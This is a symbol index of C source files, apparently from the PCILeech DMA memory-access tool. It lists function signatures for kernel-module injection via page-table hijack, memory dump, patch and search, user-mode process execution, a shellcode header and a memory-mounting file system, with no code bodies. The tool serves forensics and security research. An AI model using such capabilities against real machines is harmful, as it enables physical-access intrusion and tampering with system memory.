function VOID (line 1642) | VOID KMD_PhysicalMemoryMapDisplay(_In_ PKMDHANDLE phKMD)
function VOID (line 1658) | VOID KMD_CheckMigrationStatus()
function KMD_GetPhysicalMemoryMap (line 1679) | _Success_(return)
function KMD_SetupStage3 (line 1709) | _Success_(return)
function KMDReadMemory_DMABufferSized (line 1745) | _Success_(return)
function KMDWriteMemory_DMABufferSized (line 1759) | _Success_(return)
function KMDReadMemory (line 1773) | _Success_(return)
function KMDWriteMemory (line 1789) | _Success_(return)
function VOID (line 1805) | VOID KMDUnload()
function VOID (line 1813) | VOID KMDClose()
function KMDOpen_MemoryScan (line 1823) | _Success_(return)
function KMDOpen_PageTableHijack (line 1941) | _Success_(return)
function KMD_SetupStage3_FromPartial (line 2066) | _Success_(return)
function KMDOpen_LoadExisting (line 2081) | _Success_(return)
function KMDOpen (line 2115) | _Success_(return)
FILE: pcileech/memdump.c
type MEMDUMP_FILEWRITE_DATA (line 22) | typedef struct tdMEMDUMP_FILEWRITE_DATA {
type MEMDUMP_FILEWRITE (line 29) | typedef struct tdMEMDUMP_FILEWRITE {
function VOID (line 39) | VOID MemoryDump_SetOutFileName()
function DWORD (line 60) | DWORD WINAPI MemoryDump_File_ThreadProc(_In_ PMEMDUMP_FILEWRITE ctx)
function VOID (line 80) | VOID MemoryDump_File_Close(_Post_ptr_invalid_ PMEMDUMP_FILEWRITE pfw)
function PMEMDUMP_FILEWRITE (line 90) | PMEMDUMP_FILEWRITE MemoryDump_File_Initialize(_In_ BOOL fAllocFile4GB)
function VOID (line 144) | VOID ActionMemoryDump_KMD_USB3380()
function VOID (line 191) | VOID ActionMemoryDump_Native()
function VOID (line 239) | VOID ActionMemoryDump()
function VOID (line 250) | VOID ActionMemoryProbe()
function VOID (line 279) | VOID ActionMemoryDisplayPhysical()
function VOID (line 305) | VOID ActionMemoryDisplayVirtual()
function VOID (line 344) | VOID ActionMemoryPageDisplay()
function VOID (line 359) | VOID ActionMemoryTestReadWrite()
function VOID (line 400) | VOID ActionMemoryWrite()
FILE: pcileech/mempatch.c
function Patch_CmpChunk (line 12) | _Success_(return)
function Patch_FindAndPatch (line 43) | _Success_(return)
function VOID (line 72) | VOID ActionPatchAndSearchPhysical()
type SEARCH_INTERNAL_CONTEXT (line 160) | typedef struct tdSEARCH_INTERNAL_CONTEXT {
function BOOL (line 174) | BOOL ActionPatchAndSearchVirtual_ResultCB(_In_ PVMMDLL_MEM_SEARCH_CONTEX...
function VOID (line 212) | VOID ActionPatchAndSearchVirtual()
FILE: pcileech/ob/ob.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type tdVMM_HANDLE (line 22) | struct tdVMM_HANDLE
type OB (line 53) | typedef struct tdOB {
type VOID (line 76) | typedef VOID(*OB_CLEANUP_CB)(_In_ PVOID pOb);
function PVOID (line 103) | __forceinline PVOID Ob_Alloc(_In_ DWORD tag, _In_ UINT uFlags, _In_ SIZE...
type OB_DATA (line 150) | typedef struct tdOB_DATA {
type OB_CONTAINER (line 186) | typedef struct tdOB_CONTAINER {
type tdOB_SET (line 239) | struct tdOB_SET
type tdOB_MAP (line 395) | struct tdOB_MAP
type OB_MAP_ENTRY (line 402) | typedef struct tdOB_MAP_ENTRY {
type VOID (line 636) | typedef VOID(*OB_MAP_FILTER_PFN_CB)(_In_opt_ PVOID ctx, _In_ QWORD k, _I...
type VOID (line 641) | typedef VOID(*OB_MAP_FILTERSET_PFN_CB)(_In_opt_ PVOID ctx, _In_ POB_SET ...
type BOOL (line 646) | typedef BOOL(*OB_MAP_FILTER_REMOVE_PFN_CB)(_In_opt_ PVOID ctx, _In_ QWOR...
type tdOB_CACHEMAP (line 725) | struct tdOB_CACHEMAP
type BOOL (line 738) | typedef BOOL(*OB_CACHEMAP_VALIDENTRY_PFN_CB)(
type tdOB_STRMAP (line 837) | struct tdOB_STRMAP
type tdOB_COMPRESSED (line 1088) | struct tdOB_COMPRESSED
type tdOB_MEMFILE (line 1147) | struct tdOB_MEMFILE
type tdOB_COUNTER (line 1231) | struct tdOB_COUNTER
type OB_COUNTER_ENTRY (line 1233) | typedef struct tdOB_COUNTER_ENTRY {
type tdOB_BYTEQUEUE (line 1404) | struct tdOB_BYTEQUEUE
FILE: pcileech/ob/ob_cachemap.c
type OB_CACHEMAPENTRY (line 29) | typedef struct tdOB_CACHEMAPENTRY {
type OB_CACHEMAP (line 36) | typedef struct tdOB_CACHEMAP {
function _ObCacheMap_Clear (line 48) | _Success_(return)
function ObCacheMap_Clear (line 74) | _Success_(return)
function PVOID (line 80) | PVOID _ObCacheMap_RemoveByKey(_In_ POB_CACHEMAP pcm, _In_ QWORD qwKey, _...
function PVOID (line 106) | PVOID _ObCacheMap_GetByKey(_In_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function _ObCacheMap_Push (line 129) | _Success_(return)
function PVOID (line 169) | PVOID ObCacheMap_GetByKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function PVOID (line 182) | PVOID ObCacheMap_RemoveByKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function BOOL (line 193) | BOOL ObCacheMap_ExistsKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function DWORD (line 203) | DWORD ObCacheMap_Size(_In_opt_ POB_CACHEMAP pcm)
function ObCacheMap_Push (line 208) | _Success_(return)
function VOID (line 219) | VOID _ObCacheMap_ObCloseCallback(_In_ POB_CACHEMAP pObCacheMap)
function POB_CACHEMAP (line 237) | POB_CACHEMAP ObCacheMap_New(_In_opt_ VMM_HANDLE H, _In_ DWORD cMaxEntrie...
FILE: pcileech/ob/ob_core.c
function PVOID (line 38) | PVOID Ob_AllocEx(_In_opt_ VMM_HANDLE H, _In_ DWORD tag, _In_ UINT uFlags...
function PVOID (line 67) | PVOID Ob_XINCREF(_In_opt_ PVOID pObIn)
function PVOID (line 87) | PVOID Ob_XDECREF(_In_opt_ PVOID pObIn)
function VOID (line 130) | VOID Ob_XDECREF_NULL(_In_opt_ PVOID *ppOb)
function BOOL (line 146) | BOOL Ob_VALID_TAG(_In_ PVOID pObIn, _In_ DWORD tag)
function POB_DATA (line 163) | POB_DATA ObData_New(_In_opt_ VMM_HANDLE H, _In_ PBYTE pb, _In_ DWORD cb)
FILE: pcileech/ob/ob_map.c
type OB_MAP (line 31) | typedef struct tdOB_MAP {
function VOID (line 76) | VOID _ObMap_ObFreeAllObjects(_In_ POB_MAP pObMap)
function VOID (line 98) | VOID _ObMap_ObCloseCallback(_In_ POB_MAP pObMap)
function POB_MAP_ENTRY (line 117) | POB_MAP_ENTRY _ObMap_GetFromIndex(_In_ POB_MAP pm, _In_ DWORD iEntry)
function QWORD (line 123) | QWORD _ObMap_GetFromEntryIndex(_In_ POB_MAP pm, _In_ BOOL fValueHash, _I...
function VOID (line 129) | VOID _ObMap_SetHashIndex(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ DWO...
function VOID (line 138) | VOID _ObMap_InsertHash(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ DWORD...
function VOID (line 151) | VOID _ObMap_RemoveHash(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ QWORD...
function _ObMap_GetEntryIndexFromKeyOrValue (line 178) | _Success_(return)
function BOOL (line 204) | BOOL _ObMap_Exists(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ QWORD kv)
function DWORD (line 215) | DWORD ObMap_Size(_In_opt_ POB_MAP pm)
function BOOL (line 226) | BOOL ObMap_Exists(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function BOOL (line 237) | BOOL ObMap_ExistsKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 242) | PVOID _ObMap_GetByEntryIndex(_In_ POB_MAP pm, _In_ DWORD iEntry)
function PVOID (line 249) | PVOID _ObMap_GetByKey(_In_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 255) | PVOID _ObMap_GetNext(_In_ POB_MAP pm, _In_opt_ PVOID pvObject)
function PVOID (line 266) | PVOID _ObMap_GetNextByKey(_In_ POB_MAP pm, _In_ QWORD qwKey, _In_opt_ PV...
function PVOID (line 277) | PVOID _ObMap_GetNextByIndex(_In_ POB_MAP pm, _Inout_ PDWORD pdwIndex, _I...
function _ObMap_QFind (line 296) | _Success_(return)
function PVOID (line 350) | PVOID _ObMap_GetNextByKeySorted(_In_ POB_MAP pm, _In_ QWORD qwKey, _In_o...
function QWORD (line 367) | QWORD _ObMap_GetKey(_In_ POB_MAP pm, _In_ PVOID pvObject)
function _ObMap_Filter (line 374) | _Success_(return)
function POB_SET (line 387) | POB_SET _ObMap_FilterSet(_In_ POB_MAP pm, _In_opt_ PVOID ctx, _In_ OB_MA...
function PVOID (line 411) | PVOID ObMap_GetByIndex(_In_opt_ POB_MAP pm, _In_ DWORD index)
function PVOID (line 423) | PVOID ObMap_GetByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 439) | PVOID ObMap_GetNext(_In_opt_ POB_MAP pm, _In_opt_ PVOID pvObject)
function PVOID (line 459) | PVOID ObMap_GetNextByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey, _In_opt_...
function PVOID (line 477) | PVOID ObMap_GetNextByKeySorted(_In_opt_ POB_MAP pm, _In_ QWORD qwKey, _I...
function PVOID (line 498) | PVOID ObMap_GetNextByIndex(_In_opt_ POB_MAP pm, _Inout_ PDWORD pdwIndex,...
function QWORD (line 510) | QWORD ObMap_GetKey(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function PVOID (line 521) | PVOID ObMap_Peek(_In_opt_ POB_MAP pm)
function QWORD (line 531) | QWORD ObMap_PeekKey(_In_opt_ POB_MAP pm)
function ObMap_Filter (line 543) | _Success_(return)
function POB_SET (line 559) | POB_SET ObMap_FilterSet(_In_opt_ POB_MAP pm, _In_opt_ PVOID ctx, _In_opt...
function VOID (line 568) | VOID ObMap_FilterSet_FilterAllKey(_In_opt_ PVOID ctx, _In_ POB_SET ps, _...
function PVOID (line 584) | PVOID _ObMap_RetrieveAndRemoveByEntryIndex(_In_ POB_MAP pm, _In_ DWORD i...
function PVOID (line 608) | PVOID _ObMap_RemoveOrRemoveByKey(_In_ POB_MAP pm, _In_ BOOL fValueHash, ...
function DWORD (line 616) | DWORD _ObMap_RemoveByFilter(_In_ POB_MAP pm, _In_opt_ PVOID ctx, _In_ OB...
function PVOID (line 641) | PVOID ObMap_Pop(_In_opt_ POB_MAP pm)
function PVOID (line 654) | PVOID ObMap_PopWithKey(_In_opt_ POB_MAP pm, _Out_opt_ PQWORD pKey)
function PVOID (line 666) | PVOID ObMap_Remove(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function PVOID (line 679) | PVOID ObMap_RemoveByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function DWORD (line 691) | DWORD ObMap_RemoveByFilter(_In_opt_ POB_MAP pm, _In_opt_ PVOID ctx, _In_...
function ObMap_Clear (line 703) | _Success_(return)
function _ObMap_SortEntryIndex (line 727) | _Success_(return)
function _ObMap_SortEntryIndexByKey_CmpSort (line 757) | int _ObMap_SortEntryIndexByKey_CmpSort(_In_ POB_MAP_ENTRY e1, _In_ POB_M...
function ObMap_SortEntryIndex (line 772) | _Success_(return)
function ObMap_SortEntryIndexByKey (line 785) | _Success_(return)
function _ObMap_Grow (line 801) | _Success_(return)
function _ObMap_Push (line 829) | _Success_(return)
function _ObMap_PushCopy (line 863) | _Success_(return)
function _ObMap_PushAll (line 875) | _Success_(return)
function ObMap_Push (line 898) | _Success_(return)
function ObMap_PushCopy (line 914) | _Success_(return)
function ObMap_PushAll (line 927) | _Success_(return)
function POB_MAP (line 942) | POB_MAP ObMap_New(_In_opt_ VMM_HANDLE H, _In_ QWORD flags)
FILE: pcileech/ob/ob_set.c
type OB_SET_TABLE_ENTRY (line 29) | typedef struct tdOB_SET_TABLE_ENTRY {
type OB_SET_TABLE_DIRECTORY_ENTRY (line 36) | typedef struct tdOB_SET_TABLE_DIRECTORY_ENTRY {
type OB_SET (line 43) | typedef struct tdOB_SET {
function VOID (line 82) | VOID _ObSet_ObCloseCallback(_In_ POB_SET pObSet)
function POB_SET (line 116) | POB_SET ObSet_New(_In_opt_ VMM_HANDLE H)
function QWORD (line 128) | QWORD _ObSet_GetValueFromIndex(_In_ POB_SET pvs, _In_ DWORD iValue)
function VOID (line 139) | VOID _ObSet_SetValueFromIndex(_In_ POB_SET pvs, _In_ DWORD iValue, _In_ ...
function DWORD (line 151) | DWORD _ObSet_GetIndexFromHash(_In_ POB_SET pvs, _In_ DWORD iHash)
function VOID (line 156) | VOID _ObSet_SetHashIndex(_In_ POB_SET pvs, _In_ DWORD iHash, _In_ DWORD ...
function VOID (line 165) | VOID _ObSet_InsertHash(_In_ POB_SET pvs, _In_ DWORD iValue)
function VOID (line 178) | VOID _ObSet_RemoveHash(_In_ POB_SET pvs, _In_ DWORD iHash)
function _ObSet_GetIndexFromValue (line 201) | _Success_(return)
function BOOL (line 220) | BOOL _ObSet_Exists(_In_ POB_SET pvs, _In_ QWORD value)
function BOOL (line 231) | BOOL ObSet_Exists(_In_opt_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 246) | QWORD ObSet_Get(_In_opt_ POB_SET pvs, _In_ DWORD index)
function QWORD (line 251) | QWORD _ObSet_GetNext(_In_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 261) | QWORD _ObSet_GetNextByIndex(_In_ POB_SET pvs, _Inout_ PDWORD pdwIndex)
function QWORD (line 281) | QWORD ObSet_GetNext(_In_opt_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 298) | QWORD ObSet_GetNextByIndex(_In_opt_ POB_SET pvs, _Inout_ PDWORD pdwIndex)
function POB_DATA (line 303) | POB_DATA _ObSet_GetAll(_In_ POB_SET pvs)
function POB_DATA (line 321) | POB_DATA ObSet_GetAll(_In_opt_ POB_SET pvs)
function BOOL (line 326) | BOOL _ObSet_Remove(_In_ POB_SET pvs, _In_ QWORD value)
function BOOL (line 355) | BOOL ObSet_Remove(_In_opt_ POB_SET pvs, _In_ QWORD value)
function VOID (line 365) | VOID ObSet_Clear(_In_opt_ POB_SET pvs)
function QWORD (line 382) | QWORD _ObSet_Pop(_In_ POB_SET pvs)
function QWORD (line 402) | QWORD ObSet_Pop(_In_opt_ POB_SET pvs)
function _ObSet_Grow (line 412) | _Success_(return)
function _ObSet_Push (line 433) | _Success_(return)
function _ObSet_PushSet (line 463) | _Success_(return)
function _ObSet_PushData (line 478) | _Success_(return)
function ObSet_Push (line 497) | _Success_(return)
function ObSet_PushSet (line 510) | _Success_(return)
function ObSet_PushData (line 523) | _Success_(return)
function VOID (line 537) | VOID ObSet_Push_PageAlign(_In_opt_ POB_SET pvs, _In_ QWORD a, _In_ DWORD...
function DWORD (line 554) | DWORD ObSet_Size(_In_opt_ POB_SET pvs)
FILE: pcileech/oscompatibility.c
function VOID (line 11) | VOID usleep(_In_ DWORD us)
type INTERNAL_HANDLE (line 37) | typedef struct tdINTERNAL_HANDLE {
function HANDLE (line 42) | HANDLE LocalAlloc(DWORD uFlags, SIZE_T uBytes)
function VOID (line 51) | VOID LocalFree(HANDLE hMem)
function QWORD (line 60) | QWORD GetTickCount64()
function BOOL (line 67) | BOOL QueryPerformanceFrequency(_Out_ LARGE_INTEGER *lpFrequency)
function BOOL (line 73) | BOOL QueryPerformanceCounter(_Out_ LARGE_INTEGER *lpPerformanceCount)
function HANDLE (line 81) | HANDLE CreateThread(
function VOID (line 104) | VOID GetLocalTime(LPSYSTEMTIME lpSystemTime)
function HANDLE (line 120) | HANDLE FindFirstFileA(LPSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
function BOOL (line 139) | BOOL FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData)
function DWORD (line 156) | DWORD InterlockedAdd(DWORD *Addend, DWORD Value)
function HMODULE (line 165) | HMODULE LoadLibraryA(LPSTR lpFileName)
function BOOL (line 170) | BOOL FreeLibrary(_In_ HMODULE hLibModule)
function FARPROC (line 176) | FARPROC GetProcAddress(HMODULE hModule, LPSTR lpProcName)
function pthread_tryjoin_np (line 184) | static int pthread_tryjoin_np(pthread_t thread, void **retval)
function BOOL (line 203) | BOOL GetExitCodeThread(HANDLE hThread, PDWORD lpExitCode)
function VOID (line 215) | VOID InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 222) | VOID DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 227) | VOID EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 231) | VOID LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 239) | VOID terminal_enable_raw_mode()
function VOID (line 247) | VOID terminal_disable_raw_mode()
function BOOL (line 255) | BOOL _kbhit()
function futex (line 278) | static int futex(uint32_t *uaddr, int futex_op, uint32_t val, const stru...
function VOID (line 283) | VOID InitializeSRWLock(PSRWLOCK pSRWLock)
function BOOL (line 288) | BOOL AcquireSRWLockExclusive_Try(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 299) | VOID AcquireSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function AcquireSRWLockExclusive_Timeout (line 312) | _Success_(return)
function VOID (line 339) | VOID ReleaseSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 353) | VOID InitializeSRWLock(PSRWLOCK pSRWLock)
function BOOL (line 360) | BOOL AcquireSRWLockExclusive_Try(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 366) | VOID AcquireSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function AcquireSRWLockExclusive_Timeout (line 372) | _Success_(return)
function VOID (line 380) | VOID ReleaseSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function DWORD (line 399) | DWORD GetModuleFileNameA(_In_opt_ HMODULE hModule, _Out_ LPSTR lpFilenam...
function DWORD (line 420) | DWORD GetModuleFileNameA(_In_opt_ HMODULE hModule, _Out_ LPSTR lpFilenam...
FILE: pcileech/oscompatibility.h
type QWORD (line 23) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 61) | typedef void VOID, *PVOID, *LPVOID;
type BOOL (line 63) | typedef uint32_t BOOL, *PBOOL;
type BYTE (line 64) | typedef uint8_t BYTE, *PBYTE, *LPBYTE;
type UCHAR (line 65) | typedef uint8_t UCHAR, *PUCHAR;
type CHAR (line 66) | typedef char CHAR, *PCHAR, *PSTR, *LPSTR;
type SHORT (line 68) | typedef int16_t SHORT, *PSHORT;
type LONG (line 69) | typedef int32_t LONG;
type LONGLONG (line 70) | typedef int64_t LONGLONG;
type WORD (line 71) | typedef uint16_t WORD, *PWORD, USHORT, *PUSHORT;
type WCHAR (line 72) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type UINT (line 74) | typedef uint32_t UINT, DWORD, *PDWORD, *LPDWO...
type QWORD (line 75) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type DWORD64 (line 76) | typedef uint64_t DWORD64, *PDWORD64, LARGE_IN...
type SIZE_T (line 77) | typedef size_t SIZE_T, *PSIZE_T;
type M128A (line 78) | typedef struct _M128A { ULONGLONG Low; LONGLONG High; } M128A, *PM128A;
type EXCEPTION_RECORD32 (line 80) | typedef struct tdEXCEPTION_RECORD32 { CHAR sz[80]; } EXCEPTION_RECORD32;
type EXCEPTION_RECORD64 (line 81) | typedef struct tdEXCEPTION_RECORD64 { CHAR sz[152]; } EXCEPTION_RECORD64;
type SID (line 82) | typedef struct tdSID { BYTE pb[12]; } SID, *PSID;
type DWORD (line 83) | typedef DWORD(*PTHREAD_START_ROUTINE)(PVOID);
type DWORD (line 84) | typedef DWORD(*LPTHREAD_START_ROUTINE)(PVOID);
type CRITICAL_SECTION (line 219) | typedef struct tdCRITICAL_SECTION {
type SYSTEMTIME (line 228) | typedef struct _SYSTEMTIME {
type WIN32_FIND_DATAA (line 239) | typedef struct _WIN32_FIND_DATAA {
type SRWLOCK (line 277) | typedef struct tdSRWLOCK {
type SRWLOCK (line 284) | typedef struct tdSRWLOCK {
FILE: pcileech/pcileech.c
function BOOL (line 21) | BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[])
function VOID (line 241) | VOID PCILeechConfigFixup()
function VOID (line 260) | VOID PCILeechFreeContext()
function VOID (line 277) | VOID WINAPI PCILeechCtrlHandler_TryShutdownThread(PVOID pv)
function BOOL (line 289) | BOOL WINAPI PCILeechCtrlHandler(DWORD fdwCtrlType)
function VOID (line 303) | VOID PCILeechCtrlHandlerInitialize()
function VOID (line 310) | VOID PCILeechCtrlHandlerInitialize()
function main (line 316) | int main(_In_ int argc, _In_ char* argv[])
FILE: pcileech/pcileech.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type WORD (line 15) | typedef uint16_t WORD, *PWORD, USHORT, *PUSHORT;
type QWORD (line 16) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIGNATUREPTE (line 24) | typedef struct tdSignaturePTE {
type PCILEECH_CONTEXT (line 30) | typedef struct tdPCILEECH_CONTEXT PCILEECH_CONTEXT, *PPCILEECH_CO...
type ACTION_TYPE (line 32) | typedef enum tdActionType {
type CONFIG_OPTION (line 66) | typedef struct tdCONFIG_OPTION {
type CONFIG (line 71) | typedef struct tdConfig {
type SIGNATURE_CHUNK (line 122) | typedef struct tdSignatureChunk {
type SIGNATURE (line 130) | typedef struct tdSignature {
type KMDEXEC (line 148) | typedef struct tdKmdExec {
type KMDDATA (line 191) | typedef struct tdKMDDATA {
type PHYSICAL_MEMORY_RANGE (line 224) | typedef struct _PHYSICAL_MEMORY_RANGE {
type KMDHANDLE (line 229) | typedef struct tdKMDHANDLE {
type VFS_CONTEXT (line 237) | typedef struct tdVFS_CONTEXT {
type tdVMM_HANDLE (line 246) | struct tdVMM_HANDLE
type tdPCILEECH_CONTEXT (line 255) | struct tdPCILEECH_CONTEXT {
FILE: pcileech/shellcode.h
type SHELLCODE_DEFAULT_STRUCT (line 9) | typedef struct tdSHELLCODE_DEFAULT_STRUCT {
FILE: pcileech/statistics.c
function VOID (line 9) | VOID _PageStatPrintMemMap(_Inout_ PPAGE_STATISTICS ps)
function VOID (line 41) | VOID _PageStatShowUpdate(_Inout_ PPAGE_STATISTICS ps)
function VOID (line 124) | VOID WINAPI _PageStatThreadLoop(_In_ PPAGE_STATISTICS ps)
function VOID (line 136) | VOID PageStatClose(_In_opt_ PPAGE_STATISTICS *ppPageStat)
function PageStatInitialize (line 154) | _Success_(return)
function VOID (line 170) | VOID PageStatUpdate(_In_opt_ PPAGE_STATISTICS pPageStat, _In_ QWORD qwAd...
function VOID (line 191) | VOID StatSearch_ShowUpdate(_Inout_ PSTATISTICS_SEARCH ps)
function VOID (line 229) | VOID WINAPI StatSearch_ThreadLoop(_In_ PSTATISTICS_SEARCH ps)
function StatSearchInitialize (line 246) | _Success_(return)
function VOID (line 263) | VOID StatSearchClose(_In_opt_ PSTATISTICS_SEARCH *ppStatSearch)
FILE: pcileech/statistics.h
type STATISTICS_INTERNAL (line 13) | typedef struct tdSTATISTICS_INTERNAL {
type PAGE_STATISTICS (line 29) | typedef struct tdPAGE_STATISTICS {
type STATISTICS_SEARCH (line 44) | typedef struct tdSTATISTICS_SEARCH {
FILE: pcileech/umd.c
function UmdCompare32 (line 14) | int UmdCompare32(const void* a, const void* b)
function VOID (line 22) | VOID Action_UmdPsList()
function VOID (line 59) | VOID Action_UmdPsVirt2Phys()
type UMD_EXEC_CONTEXT_LIMITED (line 89) | typedef struct tdUMD_EXEC_CONTEXT_LIMITED {
function VOID (line 127) | VOID UmdWinExec()
function VOID (line 273) | VOID ActionExecUserMode()
FILE: pcileech/util.c
function Util_PageTable_Helper (line 18) | _Success_(return)
function BOOL (line 45) | BOOL Util_PageTable_ReadPTE(_In_ QWORD qwCR3, _In_ QWORD qwAddressLinear...
function BOOL (line 51) | BOOL Util_PageTable_SetModeX(_In_ QWORD qwCR3, _In_ QWORD qwAddressLinear)
function BOOL (line 57) | BOOL Util_PageTable_FindSignatureBase_IsPageTableDataValid(_In_ QWORD qw...
function _Inout_updates_bytes_opt_ (line 75) | _Success_(return)
function Util_PageTable_FindSignatureBase_Search (line 94) | _Success_(return)
function Util_PageTable_Virtual2Physical (line 187) | _Success_(return)
function Util_PageTable_WindowsHintPML4 (line 208) | _Success_(return)
function Util_PageTable_FindSignatureBase (line 220) | _Success_(return)
function Util_PageTable_FindMappedAddress (line 248) | _Success_(return)
function BOOL (line 336) | BOOL Util_HexAsciiToBinary(_In_ LPSTR sz, _Out_ PBYTE pb, _In_ DWORD cb,...
function DWORD (line 348) | DWORD Util_GetFileSize(_In_ LPSTR sz)
function Util_ParseHexFileBuiltin (line 359) | _Success_(return)
function BOOL (line 398) | BOOL Util_ParseSignatureLine(_In_ PSTR szLine, _In_ DWORD cSignatureChun...
function Util_LoadSignatures (line 427) | _Success_(return)
function VOID (line 464) | VOID Util_GetFileInDirectory(_Out_writes_(MAX_PATH) LPSTR szPath, _In_ L...
function DWORD (line 479) | DWORD Util_memcmpEx(_In_ PBYTE pb1, _In_ PBYTE pb2, _In_ DWORD cb)
function VOID (line 490) | VOID Util_GenRandom(_Out_ PBYTE pb, _In_ DWORD cb)
function Util_LoadKmdExecShellcode (line 505) | _Success_(return)
function QWORD (line 549) | QWORD Util_GetNumeric(_In_ LPSTR sz)
function VOID (line 558) | VOID Util_CreateSignatureLinuxGeneric(_In_ QWORD paBase,
function VOID (line 575) | VOID Util_CreateSignatureFreeBSDGeneric(_In_ DWORD paStrTab, _In_ DWORD ...
function VOID (line 590) | VOID Util_CreateSignatureMacOSGeneric(_In_ DWORD paKernelBase, _In_ DWOR...
function VOID (line 605) | VOID Util_CreateSignatureWindowsHalGeneric(_Out_ PSIGNATURE pSignature)
function VOID (line 612) | VOID Util_CreateSignatureLinuxEfiRuntimeServices(_Out_ PSIGNATURE pSigna...
function VOID (line 619) | VOID Util_CreateSignatureSearchAll(_In_ PBYTE pb, _In_ DWORD cb, _Out_ P...
function VOID (line 628) | VOID Util_Read1M(_Out_writes_(0x00100000) PBYTE pbBuffer1M, _In_ QWORD q...
function VOID (line 686) | VOID Util_WaitForPowerOn()
function VOID (line 700) | VOID Util_WaitForPowerCycle()
function Util_FillHexAscii (line 718) | _Success_(return)
function VOID (line 776) | VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbIniti...
function VOID (line 797) | VOID Util_AsciiFilter(_In_reads_(cb) PBYTE pb, _In_ DWORD cb)
function VOID (line 808) | VOID Util_SplitString2(_In_ LPSTR sz, _In_ CHAR chSplit, _Out_writes_(MA...
function VOID (line 826) | VOID Util_GetPathExe(_Out_writes_(MAX_PATH) PCHAR szPath)
FILE: pcileech/vfs.c
type VFS_OPERATION (line 40) | typedef struct tdVFS_OPERATION {
type VFS_GLOBAL_STATE (line 51) | typedef struct tdVFS_GLOBAL_STATE {
function VfsInitOperation (line 71) | _Success_(return)
function VOID (line 98) | VOID VfsListDirectory(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_FILELIST2 ...
function BOOL (line 155) | BOOL VfsListU(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_FILELIST2 pFileList)
function BOOL (line 174) | BOOL VfsIsBlackList(_In_ LPSTR uszPathFull)
function NTSTATUS (line 182) | NTSTATUS VfsReadFile(_In_ LPSTR uszPathFull, _Out_writes_to_(cb, *pcbRea...
function NTSTATUS (line 211) | NTSTATUS VfsReadMemory(_In_ BOOL fKMD, _Out_writes_to_(cb, *pcbRead) PBY...
function NTSTATUS (line 238) | NTSTATUS VfsRead(_In_ LPSTR uszPathFull, _Out_writes_to_(cb, *pcbRead) P...
function NTSTATUS (line 252) | NTSTATUS VfsWriteFile(_In_ BOOL fAppend, _In_ LPSTR uszPathFull, _In_rea...
function NTSTATUS (line 278) | NTSTATUS VfsWriteMemory(_In_ BOOL fKMD, _In_reads_(cb) PBYTE pb, _In_ DW...
function NTSTATUS (line 292) | NTSTATUS VfsWrite(_In_ BOOL fAppend, _In_ LPSTR uszPathFull, _In_reads_(...
function VOID (line 306) | VOID VfsDelete(_In_ LPSTR uszPathFull)
function NTSTATUS (line 326) | NTSTATUS
function NTSTATUS (line 352) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 361) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 394) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 403) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 410) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 419) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 428) | NTSTATUS DOKAN_CALLBACK
function VOID (line 438) | VOID DOKAN_CALLBACK
function VOID (line 449) | VOID ActionUnMount()
function VOID (line 460) | VOID ActionMount()
function vfs_getattr (line 594) | static int vfs_getattr(const char* uszPathFull, struct stat *st)
type readdir_cb_ctx (line 638) | typedef struct td_readdir_cb_ctx {
function vfs_readdir_cb (line 643) | static void vfs_readdir_cb(_In_ PVFS_ENTRY pVfsEntry, _In_opt_ preaddir_...
function vfs_readdir (line 648) | static int vfs_readdir(const char* uszPath, void* buffer, fuse_fill_dir_...
function vfs_read (line 669) | static int vfs_read(const char* uszPath, char* buffer, size_t size, off_...
function vfs_truncate (line 685) | static int vfs_truncate(const char* path, off_t size)
function vfs_write (line 693) | static int vfs_write(const char* uszPath, const char* buffer, size_t siz...
type fuse_operations (line 709) | struct fuse_operations
